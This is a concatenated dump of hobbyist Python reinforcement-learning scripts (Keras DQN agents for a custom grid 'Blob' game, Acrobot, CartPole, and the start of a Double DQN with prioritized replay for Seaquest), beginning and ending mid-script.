os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
for enemy in self.enemies:
env[enemy.x][enemy.y] = self.d[ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
# Transform new continous state to new discrete state and count reward
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overrided, saves logs with our step number
(if this is not overrided, every .fit() call will start from 0th step)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overrided, we train for one batch only, no need to save anything on batch end
"""
pass
def on_train_end(self, _):
"""
Overrided, we don't close the writer
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
model.add(Dense(units=actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
